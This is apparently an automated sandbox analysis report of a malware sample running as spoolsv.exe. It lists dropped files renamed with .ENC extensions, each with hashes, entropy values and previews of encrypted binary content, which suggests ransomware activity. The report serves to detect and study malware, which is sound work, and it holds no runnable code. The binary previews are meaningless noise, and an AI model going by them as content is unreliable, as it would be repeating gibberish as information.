                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.@..g...A.G....R.$....,...7..,............./%q....,.......1+.n.dS....f.T,+&g}y.......Y..%.Pg....rL...X...s...\.4rt..W...T^Z+P:..(.&.hsq8....M....&A.s...]`..%.^.W..@....h4...>...PZ.nS5O7.}..[.X....V./3r.g.7~...1....F^...!....E.12$..g.?........G%.....}.fU._.....3(...-...8...E........+J....._.J_...?..o|...6x.!..3U%.....V.o9.[(...#*W..).O....K..$..Q.a..a...'^...#........o+..y=.h.3[D2{l...)Z...|n@-...{.%.p....<......,i.s.......^..e^..n..s...%...r:w.RZ.....P_C.\..t........b....E.md...`.O..m..zt.~... YFWfq?h%.eZ...z$J%.....:. Y.4...M....C:.E.k..Gm.D.6?.p.EM.2.3..3.M..._.L.*t....R.s~./E.0B...Q....A.._.ur.....M......ej.YE.....+IDb\[.}.)yB...7..D.vt)0.Z..5?c=.{...^...,...B....RI#.j....b.N..G.B.#pEp.X.l&:..."BK.C..P..l...t.zH..M...a.....^.RT.....B..2cg*o)..l....9..QW..^.c..X\...B..)@.r..F.....Gm.*_....u._.."e<v.-....;.....h...#..O....&.!]mTZ.6..^4'.&.a?......7.......*..../.|.k.w..a.;....d...[...r.@4..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704050v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.854228952060795
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/sgjv/4xrWp7qJsy73M5srwO8FHTQsC2atg5o8I5rPcXM+4Av0ZhNrZQqN:/dvgk5aM5srw/8Jrv5rPc+bnhZP
                                                                                                                                                                                                                                                      MD5:8D3019912BC3A1544B1F8555EE5FA68F
                                                                                                                                                                                                                                                      SHA1:23FD8E7A90CA53113CD6D37BB015C29504367B0D
                                                                                                                                                                                                                                                      SHA-256:1C4E4D32F9B3F26C5840B21A104D0C84227004F07BBF01D9D0CE5C3643519B31
                                                                                                                                                                                                                                                      SHA-512:2BBF04273FDE3690C441605001A5EDFE7CF3D4CCD428E01F0DCA15E4C9E5555912AD5BEC433E68783DCAC6042D784DAA6EB69AA6F57226E6DD47B6A44EF60A28
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...l...S..^.0.....h.@.....j.)....I.S.yt.....m.,...+_{.u....^D......1.dy..&..}M=a.j...kX\.a...!..gK..f.PDXl..$2.%.1n...W...F|.:F.Q.B7J..p.x....:..........G.wD!._C.... ZOkA6.W.HQ.R..#..!....Ew...y.q.wt.}..;..!....B..I....L.o0-...........'.3o......L/}.${Z...A..e..t......MT...*.Z...pF...p.{...^G.d...l.b....0.KH.Fd...;...Q..m<..x.>....U.>....d....;!I.cC.>.3.`.F..:3m.2q..P.>u'G0.%dApL.,".DrghE.W..5...8....h...3..=...........wp\.t$3...V...g.W..;\.... c.>.?.&.R=%....<...|.WEQ.....%.Z.,.@l:."4$..t.. .?.WBX.mp..X{ ......7.DQ4...QZ_.$.=m..c#...w,....g.._C.........V.......'.....*1:.O$,C~.2.....k......w4.,...U......}....b..j..`...$...T..e../...*V...`.~....f...#..N...z..........y...r..X.h.8=.....o......."..]C.2........@......?Z.G..x......_/^...l../E.C.\#WE...a.2$.z........n..W.@..1..xF......Q`|fD...~.:;../.....)..a<l%.V....i..%...(Q+.u\|]K...R.C{.ehT..e.~4@.O..O...'.(...X..`V.s.bBH.I...n..KA?z...}ar.Ex

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704051v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.877210662139428
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/vXy+PTgz/W7srmhSfwVAv40dqNP92eimn7hSFt7Hn+jKb9XqYU2ycz3do:/vi+bK/MsrwCwVsK92e5n7SFrhpU2vjO
                                                                                                                                                                                                                                                      MD5:3694D9F20D53E9C05E3542D3DF96816D
                                                                                                                                                                                                                                                      SHA1:D64BBCD93D1A844A2E245D6270CDA201D463FEC0
                                                                                                                                                                                                                                                      SHA-256:AC3698F5A4ADB8D1F56C68A884DBA1CCCB9A10401D626E405A2107F2442627E2
                                                                                                                                                                                                                                                      SHA-512:D045B1AAF2DF6920CBF2C30B2F714E3864C1B231F28C0370186194A686B40C8EF8765415DF310E705D823C94E13624AB65D0412BB1F2571F076C8D3313BA7DFC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t......w\.qYF...........v C.....`...tE...I..v,9.......8NO...(.B..-8.NY..0. .......~|.r...M.f.z?v..M..........P..o@!..6Vc?\.h.....>-...Y..FS1r..(.J..e^..=..kC..?...!.lZ[.....B.....?...M8.+.r.......DU.....&.35....6m..._.X'F..+T...2ff|.JJ..n...A......!j.....b.i6Y....-..a..u.t.d.%Q.ti\Y.e{F$..J..... .0.._.?h..B..G".w....^tWK..>V.ZS5.3Y..p.N.%.6B.....DG.a.J.<p(|...........3.MJ1['f:.GeA..05e..DF.Y~"..A.....VP.a...}p...l...7.D..G....)/...o..N-Cs..xX5..0.!Z@r...o..&...3.....G.E...b..)..7Nu9o2..U5wn.....y.....XRIy`qj...S...@..G.A+~W..;....960.!.9...h.......&....h.^.e....x.../..\...(6..m.R.......l....x......`P.S}.6....TH...7}.e.|a.4@...6/0.e.yD...~.....bb8f..T..N...EG.V[...c.5..h..w24=Q..y...IM.......Vd.=t.0p.6..N....>$..K.[.w.e.....PT...E.."....%....."l..,........eM...3H..;I.F.....as...R.u..R[...v..W..]..t.vwF>..b0.`....I .t}L.g.T_E.......^.YA......{;b.n..R..Us9....>;.^....0P...-}.s-..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704100v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.858733898717727
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/9F7w0rZaqVrjYWDlkEJbNGFQUVnrRwASbSY7K08HOorr4LqJpabefc9J+KTf:/zwu1j/lrfmriASbSY7K08HOwr4Lq2ue
                                                                                                                                                                                                                                                      MD5:5A50B9F630D73F1EC2D87F68426437E0
                                                                                                                                                                                                                                                      SHA1:A649B4C0BFDE673C60EBCA8CCABFA7E15A2C5266
                                                                                                                                                                                                                                                      SHA-256:4D30870222E4BC8D02755DE146961B385BAC32E51D6A1DF7A6BD0C8D9C75EAC1
                                                                                                                                                                                                                                                      SHA-512:AD47528E1B259ED0BA439E96ACDFBDBC671A6A056E0DFDEBDB9F8291851C14B2A0AFCEC1A0057B60D9A2B39FE716D34DB6F7E1FD9A19DF8B6C536E0E20535A94
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.VZ.n'....aQ~M../..y.Q.q[.D.K.?.U.`.8{..;.g.*pG........H.G..6p.x.3.0......c..V2..3.@....o......rV...Tt...`."..\H.....\..........h.q...F...2.-].j.P..`.T..w.m..o(.X.....;.._...X(.p...3A.0w...oq.2.$....r.`..1CD..A.i5.....Z....Wb..b..yk....+..w...T..`.7...f..S.!.9.....M...d..!./...j.5M.E...X....g.x..Vrews.X.*..9.`...#.z.^..S.a[v....P.K.1..I..).......c..&....6.a.[.j...@w........D[...^qn6...m..9C.z2..."B...~.n.F...0....}.M.f>..C.?|M....I.....6....G...-.....!..nG..*.2...NT.^.W...P8.f..I'....F.../..../'O.*..=.....M:.u..)7.+.5....)t...(.%.K...\.....^E......e7...'...:_.....\N.4.!.Q7i.,w~........P...@'.qA5.#._.[.. w.......dc>....$..` y..7.jM.&/....$X.@........M#...=...../...lw.!.Y...V....t..r..q....... ....x...k.Q..l...;.S.;.....Oh.....^6.....X3R.0....6...b-...=.)5.z.._..h2..0N\j....z#u..]...*..x7<.}uX8...l#..t..fQ..?.~..W.C.H.Y...e'N.$72.4f.*.F.C..N.mn...B`<.....sj...s.....8.E.....MR.........

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704101v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.865501649030658
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/rV4h9IEPz5722Z0SO6ubaN/CUXtRI9qjrTs8+wbJvpADSKoAO9jHmMxAxx+pQ+5:/p4+EPd220SO9s//QIjrJbZUkRGWQJY
                                                                                                                                                                                                                                                      MD5:A56779BD4594D8C1742D27374D7468FC
                                                                                                                                                                                                                                                      SHA1:AA08F9F12882B44548B582E1C6C06F6B4C1AF6F9
                                                                                                                                                                                                                                                      SHA-256:313BC5CA3C9A9342F1E43E1CD751D0CC5852A55C42C1A56C8DDAF35991DAB375
                                                                                                                                                                                                                                                      SHA-512:AAEA6CFB8DDD9CB929535BA942E94502F1B4136B16DF865D064C9F31E2BDB55FF6396A5E63B2144873A0D189AF7BE9B1C584D8AB046F7605D1635A6A472737AC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..DT..(...X.TYv...n. ..i.c....../.'.I.Q...w.*g..Z.....r.6....f.U..IN...N....gh.b..m.7P._..h.0.v..U%L.....?...Z.T.)#.\.s..h.)>i<;..j.. kn..z.`?Pn..3....D].jl..]sw..)H.f.....[U..%o..9'.....ut...{h&LO.-..}....H.m.Mz!.....Zi+..a>.!.R...2z.K.@....V...&>d.0T.%9. ,Q_/#....g.!B.<.&....F..S#.3-..F...!\.9G..:..Y.B..hdC..:..N(&.QC..........@...\7.......P7..H.g.`.aoSS...64h..}......S.f..&F..vr......2v|.......:z..,+..'cg...`.>.t.s.qy....+.0A..0W.. ^.q\...,t...F..d;... Z].7.....S.i^L........v.T...l.wI..Y....6.|.TF.<.2.%e`......K...#..A!..PQ.s..q.o.%.O..c.9...1.Xj+..y....M...S...@}.v...!........LBdE.u..p...Er0.R.^q..*..HN..J...1.&.!U...B.`.t.;(Q......"..N..|.%.y..4z..L.j...?..z.\J.I.(.R...Z.)cjw.. ."..]...w....../ M.M.d..?..P$...Ux.wf2.&.....e|.1D.;..a.hQ..>.QY.....x.T.*..X!...M..;...;.8...E`..~{.....b{......0....B.q..$w>.j.{Ua.km.%5....yx..e...?.<}Z.].e.P,M3..d.@..s..l^....K..@.Pp..J'c.a.?.U.n.. /..?V.IM...TNi..e2

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704150v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.856229514304361
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/MzXEus3fDU39Ntz/Ws3WLCMZiXvpUg47mpKB8W2lwQ0LIIpwj62HwrcSlqvn/tm:/OaPDSNtKuWpZqi7BKGQ0Vrr9L
                                                                                                                                                                                                                                                      MD5:DA5B8B39CBA8BE0142A2407535ADC688
                                                                                                                                                                                                                                                      SHA1:F3AA4B6F9BDA0E0BE0AA3119B98349D43FB98880
                                                                                                                                                                                                                                                      SHA-256:C11505E4638E8568358C1D0819AD547E0F7F4E1BCED7B2F71D40BF86B817C7FB
                                                                                                                                                                                                                                                      SHA-512:48BA484756F8424953FB35C2A51DF90EDE6C1C03CB673DF86B01449DDAE89AE071AD29704E4ADE1F51546199137C73F5B8BB2833743657F7DE1AF1787810781F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.^..s..Wo..'.gMd#.nZ....0.]..$.0.d.&6s..j.(./a....V ......<..&.*...cynC...~Iq.. .C.K..BAx#....B&..jK...P.:... GvSx.q..'h.."..q.2(9..m<6..LH..sD.W1,.`5cb....n...PT....+Y...7.)....x.L...FT..y(N......R.......X(.../.V.........=L9........V.Oamx..W..}..G..T.!.o.^m...q...%+#....[.....1f.k.u....&DB>.2g.L..8....2.rx...=P.../.Y.v..B$4.f...U..^u.V0.X....u....K.Mk.z.......s.d.e..k{./c....X.<...(8jD...p{..B.+.w.Sy.T....*.bzH(....e.i......rL6....4.X........y...R..=T..X.....l..E..2........~.t.K@kQ.o.+.?.Wix.....b.{(....t..........,.......:...V.u.#.........e.o....i[;...R..|.IU...4.x.g...7...:...f.ZO............k..O.K...|..fQy......2..^.s.%e..M.../......b.`....A.....1...!.....v.n.....#....o..Zxs...\....i-{..........hy^...|`T.....{(.Y.D..M...p....5..Ck..9=.J.P....K..".........X.U..F...uX........,u.H.....?.|*?..X.....F...9....K...e.HO..+.k..~......9..-%...S....?j.X#...ih...n.?Z)m...4.......W.T...r....Zi'..g/~..@l\

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704151v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.867596047563442
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/wmrUvdeycC6YrMUoi6k1wwv+1ggqNFP3apQdrzHZMgQCz9:/wtleRCzrG6wwv+KhMArbyPCR
                                                                                                                                                                                                                                                      MD5:3EA364DAFEF00704C9C17DFEA9EC6F88
                                                                                                                                                                                                                                                      SHA1:E97207081D6F9027B9B1172B4877C8CE2DA2E6E8
                                                                                                                                                                                                                                                      SHA-256:E25F499AA850725336A5A011E26BF2A25E8347E6B7341AD8F9DC6C6B835F024D
                                                                                                                                                                                                                                                      SHA-512:1889C75CDA658C564C946AF7DA656AC9F6BA298C706C30908388F494CC57D1A1D88DD8A3BCDBC22D5BE9FDFFF65A2997F10EF46F2A02BD2DF0350D3177BD6CF2
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..........7.%..~6.t.(..Y...u.O...0..c...I...`..'..o.@.y.4.Z..q.vME?...M#:.'.I.N.5k.T....pK.......#/KdT;.``...[.. ....\...?(..lNx.7.a&.......c......4.EF....../Zra./...~.#.8..e...L%>...0..wg{.).J.B.lQ./V_..1p..g..>..=U ...fP.^.E.Ho+-5.n.0...ZZ.C..16....I.H..xD5..}9G.... .O...0Z...< 49..6d.dI.st......c.I......M..e.....S9G.......:..-...n.;.f;,R.Z......&QZ#Y.)....t9......i4.....p;.%..!..1...8O\-.o.j.c%..Ib....D....C.2.. .~.\...i....j.."..6.j.Z5..~.:Ww.2.Rct!....WrsTR&.X6.{.6..../7.....@u.h\1..~sB.....v.jj R`.7..Ox.N..[.M...yU.......y.?>f.9O.5N8.eJ{"' .<...sJ..;.00.i.w..Vv..6$.@...9z.E...]T......]..5W...1.T..7...ef....p...K..K...........2..+..v...,...>f4H.. ....d..`.T....e9+....HA..<k^<>.O.#m...]..FtX....r..q..... @.@...>......(.b.....!.(..z!t;............/..K..r..u...:_..s.o..h.,.z...h.)8.G.x..}G.'.(..A"~w.4.*K.t...`1y....x./.^{(....z.,]Lq.).\....;..m......p...Q-..J\......K....'VW..i..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704200v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1392
                                                                                                                                                                                                                                                      Entropy (8bit):7.875302232110857
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/oyyTUoTqzb6gJU8QQaQ1bUgqj0kcAL65DiAZDQdmx9TiHGMvZ:/oyWUGqzb6CUzQaHg15Dp1Q4XTLMvZ
                                                                                                                                                                                                                                                      MD5:BC393FCC1565BFA6E2587F47EF964197
                                                                                                                                                                                                                                                      SHA1:C33CD4A2285401B8A2915B2D3D9577B1CD4225C8
                                                                                                                                                                                                                                                      SHA-256:02355C24C226E094C6BB17475C37C10D0F681D3DFCCFED5EB0CC0AD28056CF31
                                                                                                                                                                                                                                                      SHA-512:8089F3F68E0B1862DD1A2F4AA2B4A90194623389E336ABA7044A1D7389C720BFF73A529A00B29723625BD5FE2FC4CC31BB19C105CF6C3CFF4FBC622FD3E1176D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...|F.......^....L.7:...^:N.L.."....DI..COz.."9]......-..J.).DkN...?o...;$r....G.....N..\...:X...jk.i../..........*..c\..Cjv......1....;.0?..L....i.Z.^Un.".j.HfU...@S..z...[u..h...."g.<..8....).l.....\...2.Y..V...q........./PK ..;.[.m......'...+.X0.....`.v>....t......T....O&ps.b......l....1y\j...0<h..].`..^[.6.*..Np7.`...H.6..!G.m3..2Ha.Pf..,.I).....D-.i*b...jl,.9."....z..|.Oj~..5t....A....h.9M/.h....:9.g ..z..F.2..AG.`...G... a$1zS...1.,.*..l.......u.D.."i...#....B.......A...q.e..1....2....B.+RPJ.......T....!8Ou..l..woCN.....a..GB<.e^.G......"....r..?.C+..p.vv..G%$d.]......w...\.9.........x...[JN.....aqU....Q.2..`...<].n......E.r..A...{...3..I..s..9[.f..I.KE.v....v.....fg..v. .R.$..(N......4.'.!.$..m.Wu.PW'j(.5...z.k.c...m..]w..IV...]...h........r.`.].C..-...o.)x..g.r=EB/C..M..C....{.V(\S.V2f.j..c.............:;,o....._.c..2bg.OB...Q.....=dGu^W.a.#..#...v.G.....z..1.Hb...LN.]R......0.u.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704201v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1424
                                                                                                                                                                                                                                                      Entropy (8bit):7.844821387969803
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/FajNJMLLJdAyiBh1I3ondZJvGWjBQ56RVbhZoctub8EgGcKZad+IGuE:/FYi/AyUfQonNvGWjW56zoctEgGqGJ
                                                                                                                                                                                                                                                      MD5:335351173819361FB113D36A8D28390B
                                                                                                                                                                                                                                                      SHA1:178A581AFB80F46886AB74CDCFF5C56B1A6E603B
                                                                                                                                                                                                                                                      SHA-256:0441994390F7BA966DC97D6587DD85BFDFCE005CD5FB3CC95BAE9980A783EE1D
                                                                                                                                                                                                                                                      SHA-512:7633C3DE4FF21C7A62E00969E6F90C272E10ADD02FEA48FA7FCB39963C86BAF9ABEFC25817517476E91D1B311963215BF4B07ECDB14948BCB5F5E1688BACCD88
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..4+6.^.....H.Y.9N.;.}.u...]..[d.h.R{n............<....\...aX..;'.MD..L..Y.;.{ .c.MC.^.Is..E...(..Y......k.4..W_ E.[2...H9....N.^Afj b.s.f...j....)"<[....Fv.`Kka..........E. .........0.......k.8..`.M..^.n&.>...(8..?|....../...8j..'..W..... ....P./f....w..V.Z.e.9.P.'..b..{w..yt...r...b,........R......t}i.....h.H.....t3J..+9.2..@....j.B-.Q...............[.....-...n.viPfN.n.....Z8..y0.<.]f.........c...D.W?..%^.gg.....Y.#A..j...{q`...L.....]...;...A.h.#..2..].Q...g...lB.._Z.|.L..?|l..@..,{.......H.#v[o.M`o,A{C_%..rD.....1.NO.8.W...Y.*.u....)..........U...t..s.?..{....2.p...O.0...t...h...;,.m...`l.......=.Q.=)......W.'..\./.A../.../......L.Wg..=..;.+^*..1j.:D~IY7..{....r)F.u..Q.i.5...].D.....vN.L....t.n_..q].6..\nq.}..Sl'bY....._.....3o......:0.1.....}~....9.1.*3..V.....E......==.o>.......F..n..%...}.A....8qXb.;.7}>SC..E&=L%.F.^.."..v.Y2.}}CyA....+.H+..Uk..4.-8h/.oy?i].....=O...#..H\.....1=~......._4.%..%v.r..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule90401v3.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1264
                                                                                                                                                                                                                                                      Entropy (8bit):7.833579403109686
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+e7Q6QwQwnznTUaa9RNXJXnrT7dToTLMLPv2m1j4BhphNrjsN9bpb35K:+e7QnufUaa7RFx8Mrv51j4Bhib38
                                                                                                                                                                                                                                                      MD5:A5E375BE0E550CE96C23418FAE54229C
                                                                                                                                                                                                                                                      SHA1:73AB2AD61AF76A89443D110905CCBF7CF61DBCD9
                                                                                                                                                                                                                                                      SHA-256:B0376CAFECDDC2AE3202DD9AC0F3200C6C936A478A99472ED209B1AF739AC966
                                                                                                                                                                                                                                                      SHA-512:8814227FB9DB2D935B72C52A1BCECA63B8D9DE52D0AEC67F315195BDD6A527729BD66382984CBE3FB3A886240A05C80E8AD12885E4D30E96374823CFC3B89293
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..UWi.T.......c.............f1.{_.....8XRk....BEU.W.g..r...fNY.lf....7..V.H@....So..t.}.qg..2.. 7Q=..t..y+..:..S\h.^U=Q.....t...r.(.j..t8Sj.^..G.:....G...G..m..\..c|R....... 7b.O..x.`JX:.`..8.&$..IR.._i../;w..#w...s..I.Z..B.Tp....F..|m.U.1.....B...%..q{...o...B....+&.5C....\>....!...3.....@2...L.A...>..O.^../5E..q.7..g.UBR....."*..I...o.+4..1..,.... .F.e...r.}....O.f...M......+.S;.R-.O|^.5./.9..:..)....J.....E.U/Q[...U.I.%3.........g.niQ.f....x...N.t.....z,m.1..bn...s2..#..;.D..=X....F..wi<2[..:....._;c .O.N.u....`..^&.6y...5.\;..0/f..H.d..2Ti.h..O...h:..J>.SC..7*M".U.z.3........j.*..k..Wu..{...g.^..^h...._..W`.o.8.+.9......0..\R....B.o(s..^.../...l&...y...1..qm..j.z..D.W.j..D.uAL.*.W.E:y.6.x".....,5.n-.....D..5t..4..tH8..Z.(3...$(...s2@.x..B..y .X._..b...B.y..q.....U..Y...W.L....3.g...vW......C./-...FX{.p.D..rJ..R.....w..^1.X%wJ.......~.|.`..=...0wQP............P..-y.n...$Y-...j. ....8......$~.x....9...|6m-..^

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):24592
                                                                                                                                                                                                                                                      Entropy (8bit):7.990366903788119
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:384:NF2CIrfruwgaLTTTCizaw8oHe+UhIipMDxtdAplgO53wRmfzqb1bWm/HIjX:N1IrywgaLTTT5Ze+WYzdmyO5imrg9/+X
                                                                                                                                                                                                                                                      MD5:4EC85F527121D0FAA727C3A06A1E3E81
                                                                                                                                                                                                                                                      SHA1:DB8763865AAF66C56EA0DA9CC1FA0994D80A8728
                                                                                                                                                                                                                                                      SHA-256:9D917E296121E1B222150E77963395B2F75EBE51A593632BC1461F48EFD4F936
                                                                                                                                                                                                                                                      SHA-512:7FC7E0B858F9929BDBB042BC369C5D11574F57F4BAF24B171EEFCA6E329669F097D7319A47D36B16F51CB6FC35F5DA0912BDD5371D226347FED66C8067BF4891
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:rS7n2.*.........b.NgKs?.?.9.L..Z.....7..!..9y...FeO. Z.....P.._R1.x.......b\)c...Aoa.s.g...wm'..3.qW...4..P..M.bq...j..sH>.C..S.L../...9pgaCk0......Ri!.=9.-.e?.E,F.._.~7"....Sr...+1..C...].s.?...._.:..l.>.a..l...m.//6.ri...../=~..dA...."2.....Y...:....*.OU."........^..Y8...Z..M....I.&0.X~..-...x.M^8g..$.H....U].w0.])........s.$.t../.Y'".eY.t5..eA@V.[:.x.....g../......,(~........i..&.+..X.zv..wY5..-...1R.3..|...I... nb.{...@. s.p.:..#7Y.l8...R..9..d(@.K~......r..H..R.+...G...._.w.F...;\L.U.,....SS..8....z!!3.2...(.......&..{..Ge{.'.}s.a.&......oV...7}..6.I48V.~|.{.i5....i.....Y..r:*.\SF..@.....-$...T..DM.%#2.Z6hz.3.L...@5..`w...oq.6+..}..[\..!.L[....f=.......&A.P..w.!..j.c.6.f....q.,....M...c..y/.<3 &pe.LH..+Y.=^..'...mt..x....N[.v.*.1.L.'..N42.9.<V.T,=i...Ua....0..........;.\..8.S..\)..uH.\x....y.7u..E!-...=......B.|.nN,.g5-..U..........4=.$3r...|...<^.yy4`.L.!.~............:...=%..>C.h..&.aIY.~..I....Z.j>....+.i..w. .......7i.W..'.DE...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\DeviceHealthSummaryConfiguration.ini.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:PGP Secret Sub-key -
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):80
                                                                                                                                                                                                                                                      Entropy (8bit):6.103055907333271
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:bE0s85Utp4qLM+4xPL3SIIyC:7x5Uj4qLM+4UI5C
                                                                                                                                                                                                                                                      MD5:A50B709EF22208291633799FCD16E883
                                                                                                                                                                                                                                                      SHA1:0BAF1E43EB144DDA4635F7DFF90B17B8C4698893
                                                                                                                                                                                                                                                      SHA-256:EC5ADB44A7B99EE9ADAAA7E1F20BAFA932D21A0079DB8B1BA7D739197E669988
                                                                                                                                                                                                                                                      SHA-512:0BBFF38B4E97869605A71FD6DDD9B2299F48ACD768F513BBECEC7101286847D6B3693E82DEA6B86FE77EBE3671A13963858F1328D766246321E313AFF2C44D8F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:......3.g..8.yP... ..?..E.q..V.|..nW}).....o.+..*.\$.z|Z...x.N|-(...b.*wX.G./.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-2023-10-05.0741.4416.1.aodl.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:COM executable for DOS
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                                      Entropy (8bit):1.2243764736604938
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:KhYXNvW5O3tUGWONeeCzOV8QIuOgIbMtezc6hj9:Kht8UPVeZd/tcP
                                                                                                                                                                                                                                                      MD5:B06D23C524FB88CE548E3B68DFF385CC
                                                                                                                                                                                                                                                      SHA1:0DFC2AA5309F3E324E5DE9804208D5DB933BAC72
